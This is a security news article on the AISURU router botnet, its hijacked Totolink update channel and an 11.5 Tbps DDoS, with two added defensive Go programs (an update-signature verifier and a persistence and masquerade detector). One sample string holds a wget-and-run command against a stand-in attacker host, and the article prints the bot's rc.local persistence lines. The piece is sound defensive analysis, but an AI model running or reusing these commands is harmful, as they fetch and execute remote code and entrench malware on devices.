AISURU Botnet With 300,000 Hijacked Routers Behind The Recent Massive 11.5 Tbps DDoS Attack


Since early 2025, the cybersecurity community has witnessed an unprecedented surge in distributed denial-of-service (DDoS) bandwidth, culminating in a record-shattering 11.5 Tbps assault attributed to a botnet named AISURU.

Identified through XLab's continuous monitoring of global DDoS activity, the botnet used a compromised router firmware update channel to amass roughly 300,000 active devices worldwide.

Researchers first detected unusual spikes of malicious traffic targeting major infrastructure providers, prompting deeper investigation into the underlying threat.


XLab analysts noted striking similarities between AISURU’s attack methodology and earlier campaigns, yet the scale and sophistication of this operation far surpassed previous benchmarks.

Propagation of AISURU began in April 2025, when the threat actors compromised a Totolink router firmware update server.

They changed the firmware download URL to point at a malicious script, so every router that performed an automatic update fetched and executed it instead of a firmware image.

In a matter of weeks, the size of AISURU’s network swelled to over 100,000 routers, and by September 2025, the botnet had consolidated around 300,000 nodes.
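The update-chain weakness described above is easiest to see in code. The following Go program is an added example, not code from XLab, Totolink or the AISURU operators: a device-side update gate that verifies a vendor Ed25519 signature over the whole manifest (URL included), enforces a host allowlist burned into the firmware, checks the image digest and refuses anything that does not carry a uImage header. The vendor and attacker domains, the manifest layout, the key generation and the sample image bytes are all hypothetical and constructed for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Manifest models the update server's answer: where the image is and what it
// hashes to. Rewriting the URL field is all the operators needed, so the device
// must verify a vendor signature over the whole document, not trust the server.
type Manifest struct {
	Version string `json:"version"`
	URL     string `json:"url"`
	SHA256  string `json:"sha256"`
}

// AllowedHosts is the download allowlist burned into the firmware (hypothetical domain).
var AllowedHosts = []string{"fw.example.invalid"}

// uImageMagic is the header a U-Boot based router expects on a firmware image.
var uImageMagic = []byte{0x27, 0x05, 0x19, 0x56}

// GoodImage is a constructed stand-in for a real image: magic plus a body.
var GoodImage = append(append([]byte{}, uImageMagic...), []byte("constructed firmware body")...)

// HijackedPayload is what a rewritten URL delivers: a script, not an image (invented address).
var HijackedPayload = []byte("#!/bin/sh\nwget http://attacker.example.invalid/t.sh -O /tmp/t.sh && sh /tmp/t.sh\n")

// ImageDigest is the hex SHA-256 the manifest carries for an image.
func ImageDigest(img []byte) string {
	sum := sha256.Sum256(img)
	return hex.EncodeToString(sum[:])
}

// NewDemoKeys stands in for the vendor's offline signing key; only the public
// half would ever ship inside the firmware.
func NewDemoKeys() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

// SignManifest is the vendor-side step. json.Marshal of a struct uses a fixed
// field order, so the signed bytes are reproducible.
func SignManifest(priv ed25519.PrivateKey, m Manifest) ([]byte, []byte) {
	body, err := json.Marshal(m)
	if err != nil {
		panic(err)
	}
	return body, ed25519.Sign(priv, body)
}

// LooksLikeFirmware is a cheap last check that still catches a script handed
// to the flasher when no signed digest exists (e.g. a manual web-UI upload).
func LooksLikeFirmware(img []byte) bool {
	return len(img) >= len(uImageMagic) && string(img[:len(uImageMagic)]) == string(uImageMagic)
}

// VerifyAndCheck is the device-side gate every update must pass before a byte
// from the network is flashed or executed.
func VerifyAndCheck(pub ed25519.PublicKey, body, sig, image []byte, hosts []string) error {
	if !ed25519.Verify(pub, body, sig) {
		return errors.New("manifest signature invalid: URL or digest was altered")
	}
	var m Manifest
	if err := json.Unmarshal(body, &m); err != nil {
		return err
	}
	u, err := url.Parse(m.URL)
	if err != nil || u.Scheme != "https" {
		return errors.New("update URL must be https")
	}
	allowed := false
	for _, h := range hosts {
		if strings.EqualFold(u.Hostname(), h) {
			allowed = true
		}
	}
	if !allowed {
		return fmt.Errorf("host %q is not in the firmware allowlist", u.Hostname())
	}
	if ImageDigest(image) != m.SHA256 {
		return errors.New("image digest mismatch: file behind the URL was replaced")
	}
	if !LooksLikeFirmware(image) {
		return errors.New("downloaded file is not a uImage; refusing to flash")
	}
	return nil
}

func main() {
	pub, priv := NewDemoKeys()
	good := Manifest{Version: "9.1.0", URL: "https://fw.example.invalid/router-9.1.0.bin", SHA256: ImageDigest(GoodImage)}
	body, sig := SignManifest(priv, good)
	fmt.Println("legitimate update:", VerifyAndCheck(pub, body, sig, GoodImage, AllowedHosts))

	// Hijack 1: someone on the update server rewrites the URL in place.
	tampered := []byte(strings.Replace(string(body), "fw.example.invalid", "attacker.example.invalid", 1))
	fmt.Println("rewritten URL:", VerifyAndCheck(pub, tampered, sig, GoodImage, AllowedHosts))

	// Hijack 2: manifest untouched, but the file at the URL is now a script.
	fmt.Println("script as image:", VerifyAndCheck(pub, body, sig, HijackedPayload, AllowedHosts))
}
```

Run as is, the first case passes while the rewritten URL fails the signature and the served script fails the digest. The decisive check is the first one: a server compromise that only rewrites the URL is harmless when the URL sits inside the signed document and the signing key never lives on that server.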

XLab researchers also identified GRE-encapsulated traffic among its flood types, and the fleet was spread across multiple command-and-control (C2) servers, so a single command could trigger a simultaneous flood of packets from the whole botnet against a target.

Cloudflare Mitigates 11.5 Tbps DDoS Attack (Source – XLab)

The impact of the 11.5 Tbps attack was felt globally as service providers scrambled to mitigate the flood of SYN, UDP, and DNS amplification requests.

Affected organizations reported intermittent outages and service degradation, highlighting the potency of combining large-scale IoT compromise with advanced evasion techniques.

XLab analysts identified the rapid shift from traditional amplification vectors to custom-crafted packet sequences designed to bypass legacy mitigation tools, an innovation that allowed AISURU to set new world records in DDoS throughput.

While AISURU’s distributed architecture and bandwidth capacity are staggering on their own, the malware’s underlying behavior reveals a deeper level of technical refinement.

Its dual-version propagation engine demonstrates continuous evolution, integrating both zero-day exploits and known N-day vulnerabilities to expand its reach.

Equally concerning is its modular design, which facilitates swift updates to encryption, communication protocols, and attack commands without requiring a complete overhaul of the malware codebase.

Infection Mechanism: Firmware Update Hijacking

Delving into AISURU’s infection mechanism uncovers a deceptively simple yet devastating approach.

In April 2025, attackers breached Totolink’s firmware update server, planting a shell script named t.sh that redirected devices to download the AISURU payload.

Once executed, the script set up persistence by appending an entry to /etc/rc.local so the bot is relaunched on every boot, and lowered its own /proc/self/oom_score_adj so that under memory pressure the kernel's OOM killer reaps other processes before the bot (the killer itself is not disabled).

The payload binary was stored under the library-like name libcow.so and, once running, hid in the process list under the name of a common system daemon such as telnetd or dhclient.

Upon initialization, AISURU performs environment checks to terminate itself under virtualized or analysis environments by scanning for virtualization artifacts and debugging tools.

It then sets up an encrypted channel to its C2 servers using a custom hybrid of AES and XOR, over which it receives commands ranging from DDoS instructions to residential proxy assignments.

One illustrative snippet of the persistence routine follows:

# Persistence setup in /etc/rc.local
echo "/usr/lib/libcow.so &" >> /etc/rc.local
chmod +x /usr/lib/libcow.so
Malicious script (Source – XLab)
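The rc.local entry, the oom_score_adj change and the daemon-name masquerade described in this section are all observable from the device itself. The Go program below is an added detection example, not part of the XLab report: it scans an rc.local body for launches from writable or library paths, flags a process whose comm claims a daemon name but whose exe lives where no such daemon is installed, and flags processes that have made themselves OOM-immune. The sample rc.local, the daemon and core-process name lists and the path rules are assumptions made for the example.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strconv"
	"strings"
)

// SampleRcLocal is a constructed /etc/rc.local: one benign service line plus
// the entry the malicious script appends.
const SampleRcLocal = `#!/bin/sh -e
# rc.local: executed at the end of multi-user boot
/usr/sbin/dnsmasq --conf-file=/etc/dnsmasq.conf
/usr/lib/libcow.so &
exit 0
`

// DaemonNames are process names a bot borrows to blend in (assumed list).
var DaemonNames = map[string]bool{"telnetd": true, "dhclient": true, "dropbear": true, "httpd": true}

// coreProcess are the few things legitimately allowed a very low oom_score_adj (assumed list).
var coreProcess = map[string]bool{"init": true, "procd": true, "ubusd": true, "sshd": true}

// writableRoots are locations no init-time daemon is launched from.
var writableRoots = []string{"/tmp/", "/var/tmp/", "/dev/shm/", "/dev/", "/usr/lib/", "/lib/"}

func underAny(p string, roots []string) bool {
	for _, r := range roots {
		if strings.HasPrefix(p, r) {
			return true
		}
	}
	return false
}

// SuspiciousRcLocalLines returns lines that launch a command from a writable
// or library directory, or that "execute" a .so file, which is never legitimate.
func SuspiciousRcLocalLines(content string) []string {
	var hits []string
	for _, raw := range strings.Split(content, "\n") {
		line := strings.TrimSpace(raw)
		if line == "" || strings.HasPrefix(line, "#") || line == "exit 0" {
			continue
		}
		cmd := strings.Fields(line)[0]
		if strings.HasSuffix(cmd, ".so") || underAny(cmd, writableRoots) {
			hits = append(hits, line)
		}
	}
	return hits
}

// Masquerading reports whether a process claiming a daemon name is backed by a
// file no such daemon would live in. An empty exe (unreadable without root, or
// a kernel thread) is treated as unknown rather than suspicious. On routers
// telnetd and dhclient are usually busybox applets, so that basename is exempt.
func Masquerading(comm, exe string) bool {
	if !DaemonNames[comm] || exe == "" {
		return false
	}
	exe = strings.TrimSuffix(exe, " (deleted)")
	if strings.HasSuffix(exe, ".so") || underAny(exe, writableRoots) {
		return true
	}
	base := filepath.Base(exe)
	return base != comm && base != "busybox"
}

// OOMImmune flags a non-core process that pushed its oom_score_adj low enough
// that the kernel will kill almost anything else first.
func OOMImmune(oomScoreAdj, comm string) bool {
	v, err := strconv.Atoi(strings.TrimSpace(oomScoreAdj))
	if err != nil {
		return false
	}
	return v <= -500 && !coreProcess[comm]
}

func main() {
	for _, l := range SuspiciousRcLocalLines(SampleRcLocal) {
		fmt.Println("rc.local:", l)
	}
	// Live /proc walk (Linux only; run as root so exe links are readable).
	entries, err := os.ReadDir("/proc")
	if err != nil {
		return
	}
	for _, e := range entries {
		pid, err := strconv.Atoi(e.Name())
		if err != nil {
			continue
		}
		base := fmt.Sprintf("/proc/%d/", pid)
		commB, err := os.ReadFile(base + "comm")
		if err != nil {
			continue // process exited mid-walk
		}
		comm := strings.TrimSpace(string(commB))
		exe, _ := os.Readlink(base + "exe")
		oom, _ := os.ReadFile(base + "oom_score_adj")
		if Masquerading(comm, exe) {
			fmt.Printf("pid %d: comm %q but exe %q\n", pid, comm, exe)
		}
		if OOMImmune(string(oom), comm) {
			fmt.Printf("pid %d (%s): oom_score_adj %s\n", pid, comm, strings.TrimSpace(string(oom)))
		}
	}
}
```

The busybox exemption matters on the devices this botnet lives on: a naive comparison of comm against the exe basename would flag every applet of the single busybox binary, while a bot that rewrites its own comm to telnetd still stands out because its backing file sits under /usr/lib, ends in .so, or has already been unlinked.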

This mechanism underscores the threat actors’ mastery over both traditional Linux administration and bespoke malware engineering, enabling AISURU to maintain dominance in the DDoS ecosystem.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.